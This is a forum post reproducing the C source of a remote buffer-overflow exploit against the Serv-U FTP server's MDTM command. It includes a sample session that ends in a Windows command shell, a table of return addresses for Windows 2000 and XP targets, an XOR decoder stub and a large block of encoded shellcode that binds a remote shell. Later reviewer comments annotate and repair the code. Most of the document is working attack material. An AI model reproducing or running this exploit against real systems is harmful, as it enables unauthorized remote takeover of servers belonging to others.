Konu: Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit — Salı Mart 11, 2008 12:04 am
/* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" command remote overflow exploit
 *
 * Copyright (c) SST 2004 All rights reserved.
 *
 * Public version
 *
 * Bug found by bkbll (bkbll@cnhonker.com), cool! pPPppPPPpp
 *
 * Code by Sam, 2004/01/07
 * <chen_xiaobo@venustech.com.cn>
 * <Sam@0x557.org>
 *
 * Revision history:
 * 2004/01/14 add rebind shellcode :> we can bind shellport at ftpd port.
 * 2004/01/09 connect back shellcode added
 * 2004/01/08 21:04 upgrade: the shellcode now goes in the file parameter,
 *            so we can attack patched Serv-U; PPPp by airsupply
 * 2004/01/08 changed shellcode, working on Serv-U 4.0/4.1/4.2 now
 *            thx airsupply
 *
 * Compile: gcc -o ex_servu ex_servu.c
 *
 * How it works (sample session; note that the tool logs in with USER/PASS
 * before sending the MDTM trigger, so it needs valid FTP credentials on the
 * target -- the overflow is reachable only post-authentication):
 *
 * [root@core exp]# ./sv -h 192.168.10.119 -t 3
 * Serv-U FTPD 3.x/4.x MDTM Command remote overflow exploit
 * bug find by bkbll (bkbll@cnhonker.com) code by Sam (Sam@0x557.org)
 *
 * # Connecting......
 * Connected.
 * USER ftp .
 * 10 bytes send.
 * PASS sst@SERV-u .
 * 17 bytes send.
 * login success .
 * remote version: Serv-U v4.x with Windows XP EN SP1
 * trigger vulnerability !
 * 1027 bytes overflow strings sent!
 * successed!!
 *
 * Microsoft Windows XP [Version 5.1.2600]
 * (C) Copyright 1985-2001 Microsoft Corp.
 *
 * [Sam Chen@SAM C:\]#
 *
 * some thanks/greets to:
 * bkbll (he found this bug), airsupply, kkqq, icbm
 * and everyone else who KNOWS SST ;P
 * http://0x557.org
 */
#include <stdio.h> #include <unistd.h> #include <stdarg.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <assert.h> #include <fcntl.h> #include <sys/time.h>
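/* Tool version string (presumably printed in the banner; the printing code is not in this chunk). */
#define VER "v5.0"

/*
 * Buffer helpers.  Both use sizeof(buff), so they only work when `buff` is
 * a real array visible in the calling scope (e.g. `char buf[MAX_LEN]`), not
 * a pointer or an array parameter -- on those they would touch only
 * sizeof(char *) bytes.  Use them as statements: `clearbit(buf);`.
 *
 * Two fixes against the original definitions:
 *  - the trailing semicolons made `clearbit(b);` expand to `...;;`, which is
 *    an empty statement and breaks `if (c) clearbit(b); else ...`;
 *  - bzero() lives in <strings.h> (not included here) and is not declared by
 *    <string.h> under a strict -std=c11 build; memset(buff, 0, n) is the
 *    standard equivalent and <string.h> is already included.
 */
#define clearbit(buff)      memset((buff), 0, sizeof (buff))
#define padding(buff, a)    memset((buff), (a), sizeof (buff))

/* Size of the request/response buffers (presumably; their use is not in this chunk). */
#define MAX_LEN 2048

/*
 * Highest valid target index.  The `architectures` table defined below has
 * five entries (indices 0..4), so a "-t" range check must be `x > MAX_NUM`,
 * not `x >= MAX_NUM`, or the last entry becomes unreachable -- verify in the
 * option parser, which is not in this chunk.
 */
#define MAX_NUM 4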
/* Selected index into the `architectures` table (set from the command line, presumably via -t). */
int x = 0;

/* TCP port of the target FTP control channel; 21 unless overridden. */
int port = 21;

/* Port the spawned shell is bound to; 0 until set (file-scope objects are zero-initialised). */
int shellport = 0;

/*
 * FTP credentials used to log in before the MDTM trigger is sent (the
 * header transcript logs in as ftp / sst@SERV-u).  Fixed 20-byte buffers:
 * NOTE(review): if these are filled from argv with strcpy() the tool itself
 * is overflowable by a long -u/-p argument -- the copying code is not in this
 * chunk; verify it bounds the length, e.g. snprintf(pass, sizeof pass, "%s", optarg).
 */
char pass[20];
char user[20];
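/*
 * Per-target table.  Each entry pairs a human-readable target description
 * with the 32-bit "magic" value the overflow string is built around for
 * that target; the entry is chosen by index (presumably the -t option shown
 * in the header's usage example).  The original source annotated the first
 * two values as addresses inside winmm.dll; they are presumably the return
 * address the overwritten saved EIP is pointed at, but the payload builder
 * is not in this chunk -- confirm there.  The other three values carry no
 * module annotation in the source.
 *
 * The forum copy turned the "// winmm.dll" comments into a bare
 * "http://winmm.dll" token inside the initializer, which does not compile;
 * the comments are restored here.
 *
 * NOTE(review): five entries (indices 0..4) while MAX_NUM is 4, so any
 * bounds check of the -t value against MAX_NUM must be inclusive
 * (`x > MAX_NUM` rejects, `x >= MAX_NUM` would drop the XP EN SP1 entry).
 */
struct archs {
    char *desc;          /* target description, printed to the user */
    unsigned int magic;  /* 32-bit value placed into the overflow string */
};

struct archs architectures[] = {
    { "Serv-U v3.x/4.x/5.x with Windows 2K CN",           0x77535985 },  /* winmm.dll */
    { "Serv-U v3.x/4.x/5.x with Windows 2K BIG5 version", 0x77531790 },  /* winmm.dll */
    { "Serv-U v3.x/4.x/5.x with Windows 2K EN",           0x77575985 },
    { "Serv-U v3.x/4.x/5.x with Windows XP CN SP1",       0x76b12f69 },
    { "Serv-U v3.x/4.x/5.x with Windows XP EN SP1",       0x76b42a3a },
};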
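/*
 * 36-byte decoder stub by airsupply, executed ahead of `shellcode`.
 *
 * Hand-decoded from the opcodes (x86-32):
 *   90 90 90          nop x3
 *   5E 5F 5B          pop esi; pop edi; pop ebx   (ebx must end up somewhere
 *                     before the payload's end marker -- depends on the stack
 *                     layout at the time of the overflow; not verified here)
 *   BE 52 52 49 41    mov esi, "RRIA"
 *   46                inc esi  -> "SRIA", the start marker (shellcode[0..3])
 *   BF 52 52 31 41    mov edi, "RR1A"
 *   41                inc ecx  (no visible effect on the loop)
 *   47                inc edi  -> "SR1A", the end marker (last 4 shellcode bytes)
 *   43 39 3B 75 FB    inc ebx; cmp [ebx], edi; jnz   -> scan forward to the end marker
 *   4B 80 33 99       dec ebx; xor byte [ebx], 0x99  -> decode backwards ...
 *   39 73 FC 75 F7    cmp [ebx-4], esi; jnz           ... until the start marker precedes ebx
 *   FF D3             call ebx                         -> ebx is now the first decoded byte
 *   90 90             nop x2
 *
 * Building the markers with inc presumably keeps the literal marker strings
 * out of the decoder itself so the scan cannot match on it.  Every payload
 * byte is XOR 0x99, which is why the encoded blob contains no NUL bytes.
 *
 * The forum copy had stray spaces inside several "\x.." escapes ("\ x46");
 * a C compiler reads those as an unknown escape plus literal text, silently
 * changing the byte count and breaking the stub.  Restored here; the byte
 * count matches the "36 bytes" the author quotes.
 */
char decoder[] =
    "\x90\x90\x90\x5E\x5F\x5B\xBE\x52\x52\x49\x41\x46\xBF\x52\x52\x31"
    "\x41\x47\x43\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7"
    "\xFF\xD3\x90\x90";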
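/*
 * Fork + rebind payload by airsupply ("one way" shellcode).  Per the
 * 2004/01/14 note in the file header it lets the shell be bound on the FTP
 * service port itself.
 *
 * Layout (636 bytes; sizeof == 637 with the terminating NUL):
 *   [0..3]      "SRIA"  start marker searched for by `decoder`
 *   [4..631]    payload, every byte XOR-encoded with 0x99 (so the encoded
 *               blob is NUL-free; 0x99 decodes to 0x00)
 *   [632..635]  "SR1A"  end marker
 *
 * "port offset 120 + 4": the two bytes at index 124..125 (0x8C 0x5B here).
 * Decoded, that run reads `push edi; push edi; push 0x02 0x00 0x15 0xC2`,
 * i.e. an inline sockaddr_in with AF_INET and sin_port in network order, so
 * this is where the caller is expected to patch `shellport` in (XOR 0x99,
 * network byte order).  The patching code is not in this chunk -- confirm
 * the offset there.  The decoded head reads fs:[0x30] (PEB) and walks the
 * loader module list, the usual import-free way to locate kernel32.
 *
 * NOTE(review): only the first instructions and the sockaddr push were
 * hand-decoded; the remainder of the payload was not audited.  Treat the
 * blob as opaque, untrusted machine code.
 *
 * The forum copy had stray spaces inside many "\x.." escapes ("\ x85");
 * those change the byte count and corrupt the payload, and are repaired here.
 */
char shellcode[] =
    "\x53\x52\x49\x41"                                                  /* "SRIA" start marker */
    /* port offset 120 + 4 */
    "\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xD9\x85\x12\x99\x12\xD9"
    "\x91\x18\x75\x19\x98\x99\x99\x12\x65\x12\x76\x32\x70\x8B\x9B\x99"
    "\x99\xC7\xAA\x50\x28\x90\x66\xEE\x65\x71\xB9\x98\x99\x99\xF1\xF5"
    "\xF5\x99\x99\xF1\xAA\xAB\xB7\xFD\xF1\xEE\xEA\xAB\xC6\xCD\x66\xCC"
    "\x9D\x32\xAA\x50\x28\x9C\x66\xEE\x65\x71\x99\x98\x99\x99\x12\x6C"
    "\x71\x94\x98\x99\x99\xAA\x66\x18\x75\x09\x98\x99\x99\xCD\xF1\x98"
    "\x98\x99\x99\x66\xCF\xB5\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF"
    "\xA9\x12\x41\xCE\xCE\xF1\x9B\x99\x8C\x5B\x12\x55\xCA\xC8\xF3\x8F"
    "\xC8\xCA\x66\xCF\xAD\xC0\xC2\x1C\x59\xEC\x68\xCE\xCA\x66\xCF\xA1"
    "\xCE\xC8\xCA\x66\xCF\xA5\x12\x49\x10\x1F\xD9\x98\x99\x99\xF1\xFC"
    "\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\x98\x99\x99\x1A\x75"
    "\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32\x7B\x64\x5F\xDD"
    "\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10\xCD\xBD\xD1\x10"
    "\xCD\xBD\xD5\x10\xCD\xBD\xC9\x14\xDD\xBD\x89\x14\x27\xDD\x98\x99"
    "\x99\xCE\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\x2F\xA9\x98\x99"
    "\x99\xC8\x66\xCF\x91\xAA\x59\xD1\xC9\x66\xCF\x95\xCA\xCC\xCF\xCE"
    "\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81"
    "\x12\xC3\xB9\x9A\x44\x7A\xA9\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65"
    "\xAA\x59\x35\xA3\x79\xED\x9E\x58\x56\x9E\x9A\x61\x72\x6B\xA2\xE5"
    "\xBD\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85"
    "\x9A\x44\x12\x9D\x12\x9A\x5C\xC6\xC7\xC4\xC2\x5B\x9D\x99\xC8\x66"
    "\xED\xBD\x91\x34\xC9\x71\x3B\x66\x66\x66\x1A\x5D\x9D\xC0\x32\x7B"
    "\x74\x5A\xF1\xFC\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\x98"
    "\x99\x99\x1A\x75\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32"
    "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10"
    "\xDD\xBD\xD1\x10\xDD\xBD\xD5\x10\xDD\xBD\xC9\x14\xDD\xBD\x89\x14"
    "\x27\xDD\x98\x99\x99\xCE\xC9\xC8\xC8\xF3\x9D\xC8\xC8\xC8\x66\x2F"
    "\xA9\x98\x99\x99\xC8\x66\xCF\x91\x18\x75\x99\x9D\x99\x99\xF1\x9E"
    "\x99\x98\x99\xCD\x66\x2F\xD1\x98\x99\x99\x66\xCF\x89\xF3\xD9\xF1"
    "\x99\x89\x99\x99\xF1\x99\xC9\x99\x99\xF3\x99\x66\x2F\xDD\x98\x99"
    "\x99\x66\xCF\x8D\x10\x1D\xBD\x21\x99\x99\x99\x10\x1D\xBD\x2D\x99"
    "\x99\x99\x12\x15\xBD\xF9\x9D\x99\x99\x5E\xD8\x62\x09\x09\x09\x09"
    "\x5F\xD8\x66\x09\x1A\x70\xCC\xF3\x99\xF1\x99\x89\x99\x99\xC8\xC9"
    "\x66\x2F\xDD\x98\x99\x99\x66\xCF\x81\xCD\x66\x2F\xD1\x98\x99\x99"
    "\x66\xCF\x85\x66\x2F\xD1\x98\x99\x99\x66\xCF\xB9\xAA\x59\xD1\xC9"
    "\x66\xCF\x95\x71\x70\x64\x66\x66\xAB\xED\x08\x95\x50\x25\x3F\xF2"
    "\x16\x6B\x81\xF8\x51\xCE\xD6\x88\x68\xE2\x05\x76\xC1\x96\xD8\x0E"
    "\x51\xCE\xD6\x8E\x4F\x15\x07\x6A\xFA\x10\x48\xD6\xA4\xF3\x2D\x19"
    "\xB4\xAB\xE1\x47\xFD\x89\x3E\x44\x95\x06\x4A\xD2\x28\x87\x0E\x98"
    "\x06\x06\x06\x06"
    "\x53\x52\x31\x41";                                                 /* "SR1A" end marker */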